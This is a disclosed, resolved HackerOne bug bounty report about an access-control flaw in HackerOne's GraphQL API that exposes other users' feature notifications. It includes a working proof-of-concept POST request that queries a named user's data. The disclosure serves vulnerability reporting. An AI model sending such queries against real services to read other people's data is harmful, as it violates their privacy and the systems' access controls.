Can read features from any user
Medium
Vulnerability Details
**Summary:**
An attacker can read feature notifications from any user.
Just need to change `me` to `user(username:"filedescriptor")` in your request to get the features.
### Steps To Reproduce
`POST /graphql HTTP/1.1
Host: hackerone.com
{"query":"query New_feature {\n query {\n id,\n ...F0\n }\n}\nfragment F0 on Query {\n user(username:\"filedescriptor\") {\n id, username\n, reputation, new_feature_notification {\n name,\n description,\n url,\n id\n }\n },\n id\n}","variables":{}}`
## Impact
An attacker can read unread features from any user and have to know how long this user did not visit the hackerone (as example). Probably in future you will make individual feature for individual user.
So now it's a bug.
Actions
View on HackerOneReport Stats
- Report ID: 316810
- State: Closed
- Substate: resolved
- Upvotes: 24